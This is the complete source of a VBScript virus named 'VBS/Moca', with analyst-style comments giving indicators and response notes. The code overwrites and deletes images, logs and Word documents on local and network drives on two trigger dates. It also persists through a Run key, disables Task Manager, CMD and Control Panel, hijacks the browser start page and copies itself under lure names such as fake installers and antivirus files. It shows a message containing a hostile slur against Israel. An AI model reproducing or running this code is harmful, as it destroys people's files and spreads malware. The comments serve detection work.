
Csript Virus VBS

rem - VBS/Moca "DL BirthDay" Virus
rem - Written by D.L. on November 8th, 2003
rem - Written by D.L. on June 24th, 2010

rem - Script entry point: shared globals are set up here and checkDate() is called
rem - as soon as the file is run by the script host.
rem - "On Error Resume Next" lets execution continue past runtime errors instead of
rem - stopping, so a step that fails does not halt the rest of the script.
On Error Resume Next
dim FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,dataFixed,newFileData,copySelfComplete
set FSobj=CreateObject("Scripting.FileSystemObject")
rem - GetSpecialFolder(1) is the Windows system folder; every file this script
rem - drops under sysDir (sys-Moca.vbs, MocaMssg.bat) is written there.
set sysDir=FSobj.GetSpecialFolder(1)



checkDate()
rem - Date-gated dispatcher, called once at script start.
rem - On 8 November or 24 June (local clock, read through Now) it calls the
rem - file-overwriting routine, the message routine and the self-copy routine.
rem - On every other date it calls only the install/persistence routine.
rem - Analyst note: what a sandbox run observes therefore depends on the system
rem - date; a run on an ordinary day shows the install path only.
function checkDate()
    if (day(Now)=8 and month(Now)=11)or(day(Now)=24 and month(Now)=6) then
        beginInfestation()
        displayMessage()
        Dupler()       
        else
        plantTrojanizedFile()
    end if    
end function

rem - Install routine for non-trigger dates: drops a second script in the system
rem - folder and writes a series of registry values.
rem - Indicators visible in this block: <system folder>\sys-Moca.vbs, a Run value
rem - named sysMoca, changed Internet Explorer start-page values, and
rem - policy/Winlogon/mouse values listed below.
rem - Hunting note: a script host (wscript/cscript) creating a .vbs file in the
rem - system folder and then writing a Run value that points at it is the
rem - behaviour to alert on.
function plantTrojanizedFile()
    rem - Create the drop file empty first; it is reopened for writing further down.
    set copySelf=FSobj.CreateTextFile(sysDir+"\sys-Moca.vbs")
    copySelf.close
    rem - Opens the running script for reading (mode 1); newFile is not read from in this block.
    set newFile=FSobj.OpenTextFile(WScript.ScriptFullname,1)
    rem - writeCopy() fills the global rawFileData with an encoded script template.
    writeCopy()
    rem - Decode the template by character substitution:
    rem -   chr(42) "*" -> chr(68) "D",  chr(37) "%" -> chr(76) "L",
    rem -   chr(124) "|" -> chr(46) ".", chr(94) "^" -> a double quote.
    rem - The dropped file therefore differs textually from the template stored in
    rem - this script, so content signatures should cover the decoded form as well.
    hackedFileData=replace(rawFileData,chr(42),chr(68))
    fixData=replace(hackedFileData,chr(37),chr(76))
    dataFixed=replace(fixData,chr(124),chr(46))
    newFileData=replace(dataFixed,chr(94),"""")
    rem - Mode 2 opens the drop file for writing; the decoded script replaces its contents.
    set copySelfComplete=FSobj.OpenTextFile(sysDir+"\sys-Moca.vbs",2)
    copySelfComplete.write newFileData
    copySelfComplete.close

    rem - Browser hijack: Internet Explorer start page and default page URL (per-user hive).
    createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.it.polinpdg.ac.com"
    createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.it.polinpdg.ac.com"
    rem - Persistence: machine-wide Run value "sysMoca" pointing at the dropped script.
    createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\sysMoca",sysDir&"\sys-Moca.vbs"
    rem - The remaining writes name policy values for taskbar settings, the command
    rem - prompt, Task Manager, Control Panel and file-extension display, plus the
    rem - logon legal-notice caption/text and the mouse-button swap value.
    rem - NOTE(review): these strings contain stray spaces (and the last one forward
    rem - slashes) exactly as shown on this page, possibly an artefact of how the
    rem - listing was published; when hunting, match on the canonical value names
    rem - rather than on this literal text.
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \NoSetTaskbar" ,"1","REG_ DWORD"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \System\DisableC MD","1"," REG_DW ORD"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \System\DisableT askMgr"," 1","RE G_DWORD"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \Explorer\ NoControlPanel" ,"1"," REG_DWORD"
    createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \Explorer\ Advanced\ HideFileExt" ,"1","REG_DWORD"   
    createRegKey "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\CurrentVersion\ Winlogon\ LegalNoticeCapti on", "THE d'commend-X - Moca-x"
    createRegKey "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\CurrentVersion\ Winlogon\ LegalNoticeText" ,"ASSALAMUALA IKUM, YA AHLIL KUBUR-say Fack for ISRAEL "
    createRegKey "HKEY_CURRENT_USER/Control Panel/Mouse SwapMouseButtons", "1","REG_ DWORD"
end function

rem - Thin wrapper around WScript.Shell.RegWrite.
rem -   regKey: full registry path of the value to write
rem -   regVal: data to store there
rem - A new WScript.Shell object is created on every call.
rem - Telemetry note: the registry writes made through this sub originate from
rem - the script host process (wscript.exe or cscript.exe).
sub createRegKey(regKey,regVal)
     dim regEdit
     set regEdit=CreateObject("WScript.Shell")
     regEdit.RegWrite regKey,regVal
end sub

rem - Trigger-date routine: enumerates every drive known to the FileSystemObject
rem - and starts the recursive folder walk on the ones it selects.
rem - DriveType 2 is a fixed disk and 3 is a network drive, so mapped shares are
rem - in scope as well as local volumes; removable and optical drives are not selected.
rem - Response note: when scoping an incident, include file servers reachable
rem - through drive letters mapped on the affected host.
sub beginInfestation
     rem - Errors (for example an unreachable drive) are skipped rather than raised.
     On Error Resume Next
     dim drive,machine,complete
    set machine=FSobj.Drives
     for each drive in machine 
         if (drive.DriveType=2)or(drive.DriveType=3) then
             indexFolders(drive.Path&"\")
        end If
    next
     rem - "complete" is never assigned a value in this sub.
     beginInfestation=complete
end sub

rem - Recursive directory walk.
rem -   location: path of the folder whose subfolders are visited
rem - For each subfolder it calls spreadData on that subfolder and then recurses
rem - into it; there is no depth limit and no exclusion list in this block.
sub indexFolders(location)
    rem - Folders that cannot be opened are skipped rather than stopping the walk.
    On Error Resume Next
    dim specs, file, subFol
    set specs=FSobj.GetFolder(location)
    set subFol=specs.SubFolders

    rem - Despite its name, "file" iterates over Folder objects here.
    for each file in subFol
        spreadData(file.Path)
        indexFolders(file.Path)
    next
end sub

rem - Destructive payload applied to one folder.
rem -   location: path of the folder whose files are processed
rem - For every file with extension jpg, gif, log, ini, doc or docx it:
rem -   1. opens the file for writing (mode 2), which discards the existing
rem -      contents, and writes a fixed text message in their place;
rem -   2. copies the now-overwritten file to <same folder>\<base name>.txt;
rem -   3. deletes the original file.
rem - Response note: the .txt files left behind hold only the message text, not
rem - the original data, so recovery has to come from backups or earlier
rem - snapshots. Many .txt files with identical content appearing next to
rem - vanished images/documents is a filesystem indicator of this routine.
sub spreadData(location)
    On Error Resume Next
        dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,finalMes,extName,complete
    set folder=FSobj.GetFolder(location)
    set directory=folder.Files

    rem - The three replace calls apply the same "*", "|", "%" substitutions used on
    rem - the script template; orgMes contains none of those characters, so finalMes
    rem - ends up equal to orgMes.
    orgMes="Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus...Written by Moca"
    mesStageTwo=replace(orgMes,chr(42),chr(68))
    mesStageThree=replace(mesStageTwo,chr(124),chr(46))
    finalMes=replace(mesStageThree,chr(37),chr(76))

    for each file in directory
        rem - Extension match is case-insensitive; "complete" is assigned but not used afterwards.
        extName=lcase(FSobj.GetExtensionName(file.Path))
        complete=lcase(file.Name)

        rem - The three branches below are identical except for the extensions they test.
        if (extName="jpg")or(extName="gif")then
            set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
            generateCopy.write finalMes
            generateCopy.Close
            appName=FSobj.GetBaseName(file.Path)
            set adExt=FSobj.GetFile(file.Path)
            adExt.copy(location&"\"&appName&".txt")
            FSobj.DeleteFile (file.Path)

                elseIf (extName="log")or(extName="ini") then
            set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
            generateCopy.write finalMes
            generateCopy.Close
            appName=FSobj.GetBaseName(file.Path)
            set adExt=FSobj.GetFile(file.Path)
            adExt.copy(location&"\"&appName&".txt")
            FSobj.DeleteFile (file.Path)

                elseIf (extName="doc")or(extName="docx") then
            set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
            generateCopy.write finalMes
            generateCopy.Close
            appName=FSobj.GetBaseName(file.Path)
            set adExt=FSobj.GetFile(file.Path)
            adExt.copy(location&"\"&appName&".txt")
            FSobj.DeleteFile (file.Path)
        end if
    next
end sub

rem - Self-copy routine, called on trigger dates only.
rem - Requests a File object through the WScript host object (presumably for the
rem - running script) and copies it to a fixed list of destinations.
rem - The destination names imitate installers, security tools and system files,
rem - and several use a double extension (".exe.vbs"); combined with the
rem - HideFileExt value named in the install routine, such a file would be listed
rem - with only the ".exe" part visible.
rem - Hunting note: look for .vbs files with these lure names in Startup folders
rem - and in a "Program" folder at the root of drives D: to K:.
rem - NOTE(review): several paths contain stray spaces exactly as shown on this
rem - page; treat the file names, not the literal strings, as the indicators.
function Dupler()
    set Dupler = FSobj.GetFile (WScript.ScriptFull.Name)
        rem - Fixed locations on C:, including an all-users Startup folder (logon persistence).
        Dupler.Copy ("C:\Program Files\Microsof 0ffice\0ffice12\Moca.vbs" )
        Dupler.Copy ("C:\Documents and Settings\All Users\StartMenu\Programs\Startup\Desktop.ini.vbs")
        Dupler.Copy ("C:\Documents and Settings\AllUsers\Desktop\ Dajjal_Antivirus .exe.vbs" )
        Dupler.Copy ("C:\Windows\ System32\ Restore\rstrui. exe.vbs")
        rem - Lure copies under \Program on other drive letters.
        Dupler.Copy ("D:\Program\ MotoGP_SETUP. vbs")
        Dupler.Copy ("E:\Program\ TuneUp2009_ SETUP.vbs" )
        Dupler.Copy ("F:\Program\ Smadav. vbs")
        Dupler.Copy ("G:\Program\ DeltaForce_ SETUP.vbs" )
        Dupler.Copy ("H:\Program\ DeltaForce_ SETUP.vbs" )
        Dupler.Copy ("I:\Program\ Ansav_SETUP. vbs")
        Dupler.Copy ("J:\Program\ Project.vbs" )
        Dupler.Copy ("J:\Program\ SM?RTP.exe.vbs" )
        Dupler.Copy ("J:\Program\ %SM%RTP%.exe.vbs" )
        Dupler.Copy ("K:\Program\ Moca.vbs" )
end function

rem - Message routine, called on trigger dates only.
rem - Writes a batch file named MocaMssg.bat into the system folder and runs it
rem - through WScript.Shell.Run; the batch file sets a console title, prints a
rem - series of taunting lines and waits at "pause".
rem - Indicators: <system folder>\MocaMssg.bat, and a script host process
rem - starting a command interpreter on that file.
function displayMessage()
        dim shell,messageFile
    set shell = CreateObject("WScript.Shell")
    rem - The batch file is created and closed empty, then created again below.
    set messageFile=FSobj.CreateTextFile(sysDir&"\MocaMssg.bat")
    messageFile.close
    rem - Replaces the global FSobj with a new FileSystemObject instance.
    set FSobj=CreateObject("Scripting.FileSystemObject")
    set messageFile=FSobj.CreateTextFile(sysDir&"\MocaMssg.bat")
    rem - Lines written verbatim into the batch file.
    messageFile.WriteLine("@title Happy Birthday to me! :) - VBS/Moca Virus")
    messageFile.WriteLine("@cls")
    messageFile.WriteLine("@@echo ASSALAMUALA IKUM, YA AHLIL KUBUR-say Fack for ISRAEL")
    messageFile.WriteLine("@echo Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus :(")
    messageFile.WriteLine("@echo. When you kill me...! ")
    messageFile.WriteLine("@echo. i can delet all your file......! ")
    messageFile.WriteLine("@echo. you can try it....@_@")
    messageFile.WriteLine("@echo. say Fack for ISRAEL-say Fack for ISRAEL-say Fack for ISRAEL say-Fack for ISRAEL ")
    messageFile.WriteLine("@echo. say Fack for ISRAEL")
    messageFile.WriteLine("@echo. say Fack for ISRAEL")
    messageFile.WriteLine("@echo. say Fack for ISRAEL")
    messageFile.WriteLine("@echo. say Fack for ISRAEL")
    messageFile.WriteLine("@pause")
    messageFile.close
    rem - Launches the batch file just written.
    shell.Run(sysDir&"\MocaMssg.bat")
end function

rem - Builds the encoded script template and stores it in the global rawFileData.
rem - The template is one long string of CRLF-joined lines in which "^", "|", "*"
rem - and "%" stand in for other characters; plantTrojanizedFile decodes it and
rem - writes the result to <system folder>\sys-Moca.vbs.
rem - What the template contains, as visible below: the date check, the drive and
rem - folder walk, the file-overwriting routine and the message routine. Its
rem - checkDate has no else branch, so the dropped copy does nothing outside the
rem - two trigger dates, and it holds no registry-writing or self-copy code.
rem - Its third extension branch tests "doc"/"exe", whereas the routine in this
rem - script tests "doc"/"docx".
rem - Response note: because the install routine's Run value points at the
rem - dropped copy, removing that Run value and the sys-Moca.vbs file before a
rem - trigger date is what prevents the destructive routine from running at logon.
function writeCopy()
    rawFileData="rem - VBS/Moca ^DL BirthDay^ Virus by *|%|" &vbcrlf& _
    "On Error Resume Next" &vbcrlf& _
    "dim FSobj,winDir,sysDir" &vbcrlf& _
    "set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
    "set sysDir=FSobj|GetSpecialFolder(1)" &vbcrlf& _
    "checkDate()" &vbcrlf& _
    "function checkDate()" &vbcrlf& _
    "if (day(Now)=8 and month(Now)=11)or(day(Now)=24 and month(Now)=6) then" &vbcrlf& _
    "beginInfestation()" &vbcrlf& _
    "displayMessage()" &vbcrlf& _     
        "end if" &vbcrlf& _
    "end function" &vbcrlf& _
    "sub beginInfestation" &vbcrlf& _
     "On Error Resume Next " &vbcrlf& _
     "dim drive,machine,complete" &vbcrlf& _
    "set machine=FSobj|Drives " &vbcrlf& _
     "for each drive in machine " &vbcrlf& _
     "if (drive|DriveType=2)or(drive|DriveType=3) then" &vbcrlf& _
     "indexFolders(drive|Path&^\^)" &vbcrlf& _
    "end If" &vbcrlf& _
    "next" &vbcrlf& _
     "beginInfestation=complete" &vbcrlf& _
    "end sub" &vbcrlf& _
    "sub indexFolders(location)" &vbcrlf& _
    "On Error Resume Next" &vbcrlf& _
    "dim specs, file, subFol" &vbcrlf& _
    "set specs=FSobj|GetFolder(location)" &vbcrlf& _
    "set subFol=specs|SubFolders" &vbcrlf& _
    "for each file in subFol" &vbcrlf& _
    "spreadData(file|Path)" &vbcrlf& _
    "indexFolders(file|Path)" &vbcrlf& _
    "next" &vbcrlf& _
    "end sub" &vbcrlf& _
    "sub spreadData(location)" &vbcrlf& _
    "On Error Resume Next" &vbcrlf& _
        "dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,finalMes,extName,complete" &vbcrlf& _
    "set folder=FSobj|GetFolder(location)" &vbcrlf& _
    "set directory=folder|Files" &vbcrlf& _
    "finalMes=^Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus...Written by Moca^" &vbcrlf& _
    "for each file in directory" &vbcrlf& _
    "extName=lcase(FSobj|GetExtensionName(file|Path))" &vbcrlf& _
    "complete=lcase(file|Name)" &vbcrlf& _
    "if (extName=^jpg^)or(extName=^gif^)then " &vbcrlf& _
    "set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
    "generateCopy|write finalMes " &vbcrlf& _
    "generateCopy|Close" &vbcrlf& _
    "appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
    "set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
    "adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
    "FSobj|DeleteFile (file|Path)" &vbcrlf& _
        "elseIf (extName=^log^)or(extName=^ini^) then" &vbcrlf& _
    "set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
    "generateCopy|write finalMes" &vbcrlf& _
    "generateCopy|Close" &vbcrlf& _
    "appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
    "set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
    "adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
    "FSobj|DeleteFile (file|Path)" &vbcrlf& _
        "elseIf (extName=^doc^)or(extName=^exe^) then" &vbcrlf& _
    "set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
    "generateCopy|write finalMes" &vbcrlf& _
    "generateCopy|Close" &vbcrlf& _
    "appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
    "set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
    "adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
    "FSobj|DeleteFile (file|Path)" &vbcrlf& _
    "end if" &vbcrlf& _
    "next" &vbcrlf& _
    "end sub" &vbcrlf& _
    "function displayMessage()" &vbcrlf& _
        "dim shell,messageFile" &vbcrlf& _
    "set shell = CreateObject(^WScript|Shell^)" &vbcrlf& _
    "set messageFile=FSobj|CreateTextFile(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
    "messageFile|close" &vbcrlf& _
    "set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
    "set messageFile=FSobj|CreateTextFile(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
    "messageFile.WriteLine(^@title Happy Birthday to me! :) - VBS/Moca Virus^)" &vbcrlf& _
    "messageFile.WriteLine(^@cls^)" &vbcrlf& _
    "messageFile.WriteLine(^@echo Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus :(^)" &vbcrlf& _
    "messageFile.WriteLine(^@echo. When you kill me...! ^)" &vbcrlf& _
    "messageFile.WriteLine(^@echo. i can delet all your file......! ^)" &vbcrlf& _
    "messageFile.WriteLine(^@echo. you can try it....@_@^)" &vbcrlf& _
    "messageFile.WriteLine(^@pause^)"&vbcrlf& _
    "messageFile.close" &vbcrlf& _
    "shell|Run(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
    "end function"
end function